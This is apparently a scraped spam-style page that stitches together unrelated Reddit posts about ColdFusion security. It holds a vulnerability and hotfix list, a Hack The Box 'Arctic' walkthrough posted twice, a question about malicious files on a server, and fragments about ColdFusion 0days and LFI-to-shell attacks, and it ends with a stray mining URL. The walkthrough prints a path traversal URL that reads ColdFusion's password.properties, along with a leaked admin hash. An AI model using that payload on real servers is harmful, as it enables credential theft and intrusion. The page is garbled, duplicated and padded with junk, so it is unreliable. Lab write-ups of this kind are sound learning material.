ColdFusion – Penetration Test Resource Page

List of CFML Vulnerabilities & Security Issues

This list is updated frequently as we detect more issues, also note that we can’t detect these issues in all cases on all servers, even if the issue has not been patched yet.
Here are some CFML Vulnerabilities & Security Issues that you might have faced-

  1. Jakarta Virtual Directory Exposed – The /jakarta virtual directory (which is required by CF10+ on Tomcat/IIS) is serving files such as isapi_redirect.properties or isapi_redirect.log. The only URI that should be served is /jakarta/isapi_redirect.dll – you can use Request Filtering to block.
  2. Bitcoin Miner Discovered – Found files in /CFIDE that match the signature of a bitcoin miner exploit. Look for /CFIDE/m /CFIDE/m32 /CFIDE/m64 and /CFIDE/updates.cfm among others.
  3. Hotfix APSB11-14 Not Installed – Apply the hotfixes located in Adobe Security Notice apsb11-14.
  4. Railo Security Issue 2635 – Input of Chr(0) to the ReplaceList function can cause infinate loop / crash. Fixed in Version 4.1.1.008
  5. XSS Injection in cfform.js – A document.write call was found in your /CFIDE/scripts/cfform.js file, an attacker may be injecting a javascript, please check your cfform.js file.
  6. Executable found in CFIDE – Found executable file(s) in /CFIDE with one of the following file extensions: dll, exe, bat, sh
  7. Heartbleed Vulnerability Detected – The heartbleed vulnerability is a bug in OpenSSL (the crypto library used by Apache, NGinx, and others) that can allow the leakage of private keys used for TLS/SSL encryption.
  8. OpenBD AdminAPI Exposed to the Public – The /bluedragon/adminapi/ directory is open to the public it should be locked down to prevent exploit.
  9. Security Hotfix APSB12-26 Not Installed – The security hotfix referenced in Adobe Security Bulletin APSB12-26 was not found to be installed on your server. This hotfix resolves a sandbox permission issue.
  10. Security Hotfix APSB17-30 Not Installed Or Partailly Installed – The security hotfix referenced in Adobe Security Bulletin APSB17-30 was not found to be fully installed on your server. For the hotfix to be effective you must have Java 8 update 121 or greater installed. This hotfix resolves two critical vulnerabilities CVE-2017-11286 and CVE-2017-11283 / CVE-2017-11284 and one important vulnerability CVE-2017-11285. The issues are resolved in ColdFusion 11 Update 13+ and ColdFusion 2016 Update 5+ with Java 8 update 121 or greater.
  11. ColdFusion Example Applications Installed – The ColdFusion example applications are installed at /cfdocs/exampleapps/ or /CFIDE/gettingstarted/, they should not be installed on a production server.
  12. Svn Hidden Directory Exposed – A request for /.svn/text-base/index.cfm.svn-base appears to resolve to a subversion repository, which could lead to source code disclosure. Please block .svn/
  13. Solr Search Service Exposed – CVE-2010-0185 detected. ColdFusion 9 Apache Solr services are exposed to the public. Any data in solr search collections may be exposed to the public. Follow the instructions in APSB10-04 to remedy, or upgrade to ColdFusion 9.0.1.
  14. TLS Compression Supported – TLS Compression should be disabled due to the CRIME TLS vulnerability.
  15. Security Hotfix APSB11-04 Not Installed – The security hotfix referenced in Adobe Security Bulletin APSB11-04 was not found to be installed on your server. This hotfix also contains most prior security hotfixes.
  16. Git Hidden Directory Exposed – A request for /.git/config appears to resolve to a git repository, wouch could lead to source code disclosure. Please block .git/
  17. Cross Site Scripting Vulnerability CVE-2011-4368 – CVE-2011-4368 detected. Apply the hotfix located in Adobe Security Notice apsb11-29.
  18. JVM Vulnerable to Java Null Byte Injection – The JVM that you are running is vulnerable to null byte injections (or null byte poisioning) in java.io file operations. Java 1.7.0_40+ or 1.8+ attempt to mitigate null byte injection attacks.
  19. Java 11 Security Update Available – The JVM that you are running contains security vulnerabilities that could be exploited in server side environments. Update to the latest version of Java 11. Note that Oracle Java 11 requires a commercial license. Adobe CF customers can download Oracle Java 11 from the ColdFusion Downloads Page. You can also use OpenJDK, Amazon Corretto, or other non-oracle JVMs for free.
  20. Security Hotfix APSB19-10 Not Installed – The security hotfix referenced in Adobe Security Bulletin APSB19-10 was not found to be installed on your server. This hotfix resolves 2 issues, one important (CVE-2019-7092) and one critical (CVE-2019-7091). The issues are resolved in ColdFusion 11 Update 16+ ColdFusion 2016 Update 8+ and ColdFusion 2018 Update 2+. For all security fixes to be effective you should also have Java 8 update 121 or greater installed.
  21. Cross Site Scripting Vulnerability CVE-2011-0583 – CVE-2011-0583 detected. Apply the hotfixes located in Adobe Security Notice apsb11-04. The detection of this vulnerability also indicates to a high degree of likelihood that the following vulnerabilities may also exist: CVE-2011-0580, CVE-2011-0581, CVE-2011-0582, CVE-2011-0584
  22. Apache 2.2 Security Update Available – The version of Apache you are running does not contain the most recent security fixes.
  23. BlaseDS/AMF External XML Entity Injection – CVE-2009-3960 detected. You must apply the hotfix specified in Adobe Security Bulliten APSB10-05, otherwise an attacker can read any file on the server that ColdFusion has permission to read. You need to do this even if you don’t use BlaseDS or Flash Remoting because it is enabled in CF by default.
  24. SSL Version 2 Enabled – Your Web Server is accepting SSL V2 connections, a weak protocol. For PCI compliance, and strong security you must disable this protocol on your web server.
  25. Missing Strict-Transport-Security Header – This domain supports HTTPS but does not send the HTTP Strict-Transport-Security response header (HSTS) to force HTTPS.
  26. The /CFIDE/scripts directory is in default location. – Consider changing the default location of /CFIDE/scripts/ by changing the value of the Default Script Src setting in the ColdFusion Administrator.
  27. Recalled Hotfix 10.0.3 Installed – You are running ColdFusion 10.0.3 which has been recalled by adobe due to bugs in the release. Please install the latest 10.0 hotfix.
  28. ComponentUtils Exposed to the Public – The /CFIDE/componentutils/ directory is open to the public it should be locked down to prevent exploit.
  29. ColdFusion Update Available – You may not be running the latest version of ColdFusion 8, consider updating to ColdFusion 8.0.1
  30. Security Hotfix APSB13-10 Not Installed – The security hotfix referenced in Adobe Security Bulletin APSB13-10 was not found on your server. This hotfix resolves authentication issues that could allow an attacker impersonate a user in your application, or a ColdFusion Administrator.
  31. CVE-2010-2861 Detected – Path Traversal Vulnerability detected (CVE-2010-2861 APSB10-18), this allows an attacker to read any file on the servers file system that ColdFusion has access to (within the same drive on windows).
  32. Security Hotfix APSB13-19 Not Installed – The security hotfix referenced in Adobe Security Bulletin APSB13-19 was not found on your server.
  33. Security Hotfix APSB12-15 Not Installed – The security hotfix referenced in Adobe Security Bulletin APSB12-15 was not found to be installed on your server. This hotfix resolves a HTTP response splitting vulnerability in the ColdFusion Component Browser CVE-2012-2041.
  34. Security Hotfix APSB16-16 Not Installed – The security hotfix referenced in Adobe Security Bulletin APSB16-16 was not found to be installed on your server. This hotfix addresses a XSS issue, a Java Deserialization Vulnerability and a TLS Hostname verification issue. This issue is fixed in ColdFusion 10 Update 19+, ColdFusion 11 Update 8+, and ColdFusion 2016 Update 1+
  35. Vulnerable PageSpeed Module – The Version of PageSpeed Module you are using may be vulnerable to one or more vulnerabilities. Update your PageSpeed web server module to the latest version to resolve.
  36. TLS 1.2 Is Not Enabled – Configure your server to accept TLS 1.2 connections for optimal HTTPS security. Note for IIS you must be running Windows 2008r2 or greater for TLS 1.2 support. You can use our IIS SSL / TLS configuration tool to toggle protocol support on your server.
  37. Java 13 EOL – Java 13 has reached end of life at the release of Java 14. It is not a LTS (Long Term Support Version), you can use Java 11 for LTS.
  38. Lucee Security Issue 2015-08-06 – Lucee fixed an XSS issue in version 4.5.1.023. This issue remains unpatched in Railo.
submitted by aligatorraid to coldfusion [link] [comments]

Does anyone else find HTB walkthroughs both validating and also soul crushing?

Like, if not for these hack the box walkthroughs, I would spend many many hours down rabbit holes that probably will lead nowhere.
Sometimes they make me feel so dumb for a lot of reasons but I feel the dumbest when I missing simple things.
Like I'm doing the Arctic box...
I run an nmap scan and get back 3 open ports. Quick google for exploits for msrpc gets me to an exploit that requires the hostname of the machine...
I run more nmap scans trying to find the hostname... nada... I guess at a few hostnames with no luck.
Running scans and looking for the hostname for maybe an hour before I decide to pull up the walkthrough.
FIRST I didn't think to navigate to 10.10.10.11:8500 , never occurred to me to put this into the web browser, even though I've done the same thing with weird ports on other boxes before.
This crushes my soul slightly. I feel like an idiot. Like not checking your corners in csgo or something. Getting bit by something obvious...
So then I stop the walkthrough, I'm like AH-HA. I can take it from here IPPSEC
Now I'm browsing directories.
I find a login screen which gives me the name of the service and the version, immediately google an exploit.
Load it up in msfconsole, fire it off to the server (windows/http/coldfusion_fckeditor) it fails, and quickly...
I'm like... I wonder if its failing because the server takes so long to respond and its sending commands and the server cant keep up or something.
I find it strange because it seems pretty promising. The file referenced in the info of the metasploit module exists on the server... its the correct version. I wonder if I have to tweak the .rb file to maybe somehow put a delay in between commands. After a while of pondering and looking through the module I give up (I know I know try harder... damnit!) with that one and start looking for other potential exploits.
I try a few more times and then essentially give up with that one.
Browse back into 10.10.10.11:8500 and now theres a new directory... I think?
I cant remember if userfiles/ was there all along... I don't think it was?
So I open it up and theres:
DUV.jsp 1399 06/07/20 01:08 μμ H.jsp 1399 06/07/20 01:10 μμ X.jsp 1399 06/07/20 01:07 μμ ZBRYASCCN.jsp 1399 06/07/20 01:10 μμ 
very very weird looking files.
I try to open them (LOL), the page loads for a while and then doesn't do anything. I view source and theres nothing in the files. I don't know what is up and think that maybe those were there the whole time and I just didn't see the 3rd directory when I started the box.
I might literally be the dumbest man alive because it says the date and time the files were made. Today.
I miss this and I look for other exploits -
I find Adobe ColdFusion - Directory Traversal on exploit db.
Download and fire it off. Not 100% sure what its doing but it looks like its going to go read password.properties or something.
I'll be damned if it doesn't return
#Wed Mar 22 20:53:51 EET 2017 rdspassword=0IA/F[[E>[$_6& \\Q>[K\=XP \n password=2F635F6D20E3FDE0C53075A84B68FB07DCEC9B03 encrypted=true 
Woah what is this
Encrypted password? I know it says encrypted but, what if I just try it in the admin login page? - nada.
I think it might be "encrypted" with base64 because I've seen that on other boxes so I try to decode it with that (LOL) - nada.
I browse to /CFIDE/administratoenter.cfm?locale=../../../../../../../../../../ColdFusion8/lib/password.properties%00en as per the exploit... see a very weird page that looks like its been edited. I view source and it also gives me a salt?
So I google "Hash+Salt" and get some info on hashcat
I try to crack it with hashcat for like half an hour with no luck. Hashcat finishes way too fast and doesn't give me anything. I know I am doing something wrong but I start to wonder if any of these boxes have you brute-force things, I think probably not and try to find something else.
I am drawing blanks so I go back to the walkthrough and pretty fast I am validated because IPPSEC also chose the windows/http/coldfusion_fckeditor exploit, and also noticed it was failing fast. I am a goober for being validated like this but, It's nice to know I'm sometimes going in the correct direction... but also soul crushing to keep finding I am *just* missing the solutions... I think probably if I ever had to do a box and I didn't have a walkthrough I'd probably miss something simple, go down deep deep rabbit holes and never finish it.
Back on the walkthrough IPPSEC opens up burp, sets up a proxy and reads the request... he finds that... indeed the exploit has created a file on the server.
Indeed the files in userfiles/ were created by this exploit.
All I had to do was setup a listener and open one of these files like before....
I face desk and write this post to vent.

Please tell me there are other people that have made dumb mistakes like I have that went on to become successful in the field.

submitted by FairlyMetaUsername to hackthebox [link] [comments]

Does anyone else find HTB walkthroughs both validating and also soul crushing?

Like, if not for these hack the box walkthroughs, I would spend many many hours down rabbit holes that probably will lead nowhere.
Sometimes they make me feel so dumb for a lot of reasons but I feel the dumbest when I missing simple things.
Like I'm doing the Arctic box...
I run an nmap scan and get back 3 open ports. Quick google for exploits for msrpc gets me to an exploit that requires the hostname of the machine...
I run more nmap scans trying to find the hostname... nada... I guess at a few hostnames with no luck.
Running scans and looking for the hostname for maybe an hour before I decide to pull up the walkthrough.
FIRST I didn't think to navigate to 10.10.10.11:8500 , never occurred to me to put this into the web browser, even though I've done the same thing with weird ports on other boxes before.
This crushes my soul slightly. I feel like an idiot. Like not checking your corners in csgo or something. Getting bit by something obvious...
So then I stop the walkthrough, I'm like AH-HA. I can take it from here IPPSEC
Now I'm browsing directories.
I find a login screen which gives me the name of the service and the version, immediately google an exploit.
Load it up in msfconsole, fire it off to the server (windows/http/coldfusion_fckeditor) it fails, and quickly...
I'm like... I wonder if its failing because the server takes so long to respond and its sending commands and the server cant keep up or something.
I find it strange because it seems pretty promising. The file referenced in the info of the metasploit module exists on the server... its the correct version. I wonder if I have to tweak the .rb file to maybe somehow put a delay in between commands. After a while of pondering and looking through the module I give up (I know I know try harder... damnit!) with that one and start looking for other potential exploits.
I try a few more times and then essentially give up with that one.
Browse back into 10.10.10.11:8500 and now theres a new directory... I think?
I cant remember if userfiles/ was there all along... I don't think it was?
So I open it up and theres:
DUV.jsp 1399 06/07/20 01:08 μμ H.jsp 1399 06/07/20 01:10 μμ X.jsp 1399 06/07/20 01:07 μμ ZBRYASCCN.jsp 1399 06/07/20 01:10 μμ 
very very weird looking files.
I try to open them (LOL), the page loads for a while and then doesn't do anything. I view source and theres nothing in the files. I don't know what is up and think that maybe those were there the whole time and I just didn't see the 3rd directory when I started the box.
I might literally be the dumbest man alive for a lot of reasons, but today its because it says the date and time those files were made. Which is today, exactly the time I ran the exploit.
I miss this and I look for other exploits -
I find Adobe ColdFusion - Directory Traversal on exploit db.
Download and fire it off. Not 100% sure what its doing but it looks like its going to go read password.properties or something.
I'll be damned if it doesn't return
#Wed Mar 22 20:53:51 EET 2017 rdspassword=0IA/F[[E>[$_6& \\Q>[K\=XP \n password=2F635F6D20E3FDE0C53075A84B68FB07DCEC9B03 encrypted=true 
Woah what is this
Encrypted password? I know it says encrypted but, what if I just try it in the admin login page? - nada.
I think it might be "encrypted" with base64 because I've seen that on other boxes so I try to decode it with that (LOL) - nada.
I browse to /CFIDE/administratoenter.cfm?locale=../../../../../../../../../../ColdFusion8/lib/password.properties%00en as per the exploit... see a very weird page that looks like its been edited. I view source and it also gives me a salt?
So I google "Hash+Salt" and get some info on hashcat
I try to crack it with hashcat for like half an hour with no luck. Hashcat finishes way too fast and doesn't give me anything. I know I am doing something wrong but I start to wonder if any of these boxes have you brute-force things, I think probably not and try to find something else.
I am drawing blanks so I go back to the walkthrough and pretty fast I am validated because IPPSEC also chose the windows/http/coldfusion_fckeditor exploit, and also noticed it was failing fast. I am a goober for being validated like this but, It's nice to know I'm sometimes going in the correct direction... but also soul crushing to keep finding I am *just* missing the solutions... I think probably if I ever had to do a box and I didn't have a walkthrough I'd probably miss something simple, go down deep deep rabbit holes and never finish it.
Back on the walkthrough IPPSEC opens up burp, sets up a proxy and reads the request... he finds that... indeed the exploit has created a file on the server.
Indeed the files in userfiles/ were created by this exploit.
All I had to do was setup a listener and open one of these files like before....
I face desk and write this post to vent.
Please tell me there are other people that have made dumb mistakes like I have that went on to become successful in the field.
submitted by FairlyMetaUsername to HowToHack [link] [comments]

How was our server loaded with malicious files java.html, AppletLow.jar and AppletHigh.jar?

The other day our host notified us that our server was hosting malicious files, see subject. The files were hosted on the CFIDE/debug/includes folder. We are running Win 2k3, Apache 2.0, Cold fusion 8, cygwin with an ssh server, and a few internal java programs running with Java 1.6 u35. I have combed the logs and haven't seen any sign of access over RDP or SSH. We are not running an FTP server and have all ports but port 80 closed to global traffic. Any ideas?
The files were used in a recent watering hole attack, according to Avast.
Thanks all!
--originally posted in /sysadmin http://www.reddit.com/sysadmin/comments/17821v/how_was_our_server_loaded_with_malicipus_files/
EDIT Here is the above mentioned blog entry
EDIT - UPDATE
Thanks all for your suggestions, links, and ideas. I took a look at the Coldfusion specific CVE's, and found that our site was susceptible to the password.properties admin password hash exploit (example at Google code here). I patched the necessary files in Coldfusion, and have blocked all external access to the CFIDE directory within Apache.
I am also working to upgrade to Apache 2.2 (I know, Apache 2.0 is old), and possibly to Java 7.
Again, thanks everyone for your help!
submitted by chopsuei3 to AskNetsec [link] [comments]

ColdFusion have a component called Remote Development Services (RDS) which is a security component used by the ColdFusion Administrator and ColdFusion Studio to provide remote HTTP-access to files and databases for the developers. For example, the ColdFusion Administrator API CFC contains basic Administrator functionality, such as login, logout, the Migration wizard or the Setup wizard.One of ... ColdFusion was originally designed to make it easier to connect simple HTML pages to a database. By Version 2 (1996), it had become a full platform that included an IDE in addition to a "full" scripting language. As of 2010, versions of ColdFusion (purchased by Adobe Systems in 2005) include advanced features for enterprise integration and development of rich Internet applications. Some details have been provided throughout the source hinting at the potential usage. # As far as changes, the Null RDS 1day has been removed, as well as the locale + FCKEditor exploitation checks & auth bypass + shell drop. # If you know what you are doing, this 0day can be used in conjunction with the other 0days to exploit ColdFusion 6-10 ... ColdFusion has several very popular LFI’s that are often used to fetch CF hashes, which can then be passed or cracked/reversed. A lesser use of this LFI, one that I haven’t seen documented as of yet, is actually obtaining a shell. When you can’t crack or pass, what’s left? The less-than-obvious solution is to exploit CFML’s parser, which acts much in the same way that PHP does when ... –wXf Web eXploitation Framework –Open Source Information Gathering –Attacking Oracle (via TNS) –Client-Side Attacks Whoami •What is ColdFusion •Who uses ColdFusion •Finding sites running ColdFusion •Attacking ColdFusion –Common vulnerabilities –Insta-Shell –Gotta work for it –Other Stuff •Post Exploitation •Defense? Agenda •Kept running into ColdFusion on pentests ...

[index] [25408] [19129] [12931] [12822] [25013] [29709] [3584] [2877] [9697] [27428]

https://gpuminingbitcoin.raarichdiffhobqua.tk